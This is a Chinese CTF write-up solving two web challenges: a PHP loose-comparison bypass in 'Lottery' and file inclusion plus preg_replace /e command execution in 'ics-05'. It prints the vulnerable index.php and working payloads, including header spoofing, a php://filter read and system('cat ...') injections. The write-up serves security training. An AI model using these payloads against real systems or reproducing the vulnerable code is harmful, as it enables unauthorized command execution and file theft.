攻防世界 Web 漏洞题解：Lottery 与 ics-05

随机生成七位数字赋值给 $win_number。关键点在于使用的是两个等号 == 来判断传入的数字和随机生成的数字，不检查类型。可以利用 PHP 弱类型比较特性，将数组元素设为布尔值来绕过。

在 BP 中拦截回应包，利用 PHP 的弱类型比较，直接将 numbers 字段改为 [true,true,true,true,true,true,true]。

成功利用弱类型得到奖金并拿到 flag。

二、ics-05

打开页面如下所示，只有此页面可打开，但似乎什么都没有。

打开页面源代码查看，发现一个 href 链接。

打开该链接，看似没什么特别的。

修改链接为 index.php 回显 ok，说明可以读取文件。如果能读取到 index.php 应该就可以拿到 flag。

读取文件使用伪协议：

php://filter/read=convert.base64-encode/resource=index.php

复制这个 base64 然后解密，观察代码如下：

如果 ip 为 127.0.0.1 就是 admin，并且有一个 preg_replace 方法，pattern 第一个参数的结尾包含了 /e 修正符的话，第二个参数就会被当做 php 代码执行。

打开 BP，修改 IP 后为 admin。

添加三个参数：

?pat=/heihei/e&rep=system('find+-name+*flag*')&sub=heihei

需要使用 + 置换空格，得到 flag.php。

成功拿到 flag，但注意 flag 不在页面渲染中显示。

再次构造请求：

?pat=/heihei/e&rep=system('cat+./s3chahahaDir/flag/flag.php')&sub=heihei

成功获取 flag。

解密后的 index.php 代码

<?php error_reporting(0); @session_start(); posix_setuid(1000); ?>
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="stylesheet" href="layui/css/layui.css" media="all">
<title>设备维护中心</title>
<meta charset="utf-8">
</head>
<body>
<ul>
<li><a href="?page=index">云平台设备维护中心</a></li>
</ul>
<fieldset>
<legend>设备列表</legend>
</fieldset>
<table></table>
<script type="text/html">
<!-- 这里的 checked 的状态只是演示 -->
<input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开 | 关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
</script>
<script src="layui/layui.js" charset="utf-8"></script>
<script>
layui.use('table', function() {
    var table = layui.table, form = layui.form;
    table.render({
        elem: '#test', url: '/somrthing.json', cellMinWidth: 80,
        cols: [ [{ type: 'numbers' }, { type: 'checkbox' }, { field: 'id', title: 'ID', width: 100, unresize: true, sort: true }, { field: 'name', title: '设备名', templet: '#nameTpl' }, { field: 'area', title: '区域' }, { field: 'status', title: '维护状态', minWidth: 120, sort: true }, { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }] ], page: true
    });
});
</script>
<script>
layui.use('element', function() {
    var element = layui.element;
    element.on('nav(demo)', function(elem) {
        layer.msg(elem.text());
    });
});
</script>
<?php
$page = $_GET[page];
if (isset($page)) {
    if (ctype_alnum($page)) {
?>
<br /><br /><br /><br />
<div>
<p><?php echo $page; die();?></p>
<br /><br /><br /><br />
<?php
    }else{
?>
<br /><br /><br /><br />
<div>
<p>
<?php
        if (strpos($page, 'input') > 0) { die(); }
        if (strpos($page, 'ta:text') > 0) { die(); }
        if (strpos($page, 'text') > 0) { die(); }
        if ($page === 'index.php') { die('Ok'); }
        include($page); die();
?>
</p>
<br /><br /><br /><br />
<?php
    }
}
//方便的实现输入输出的功能，正在开发中的功能，只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
    echo "<br >Welcome My Admin ! <br >";
    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];
    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{ die(); }
}
?>
</body>
</html>

三、总结

本文针对攻防世界平台中的 Lottery 和 ics-05 两道 Web 安全题目进行解题分析。Lottery 题目利用 PHP 的弱类型比较漏洞，通过传入布尔值数组绕过数字比对逻辑获取高额奖金；ics-05 题目结合文件包含与 preg_replace 函数执行系统命令的特性，在特定 IP 条件下构造恶意参数实现命令执行并读取 Flag。重点在于理解 PHP 类型转换机制及正则表达式修饰符的安全风险。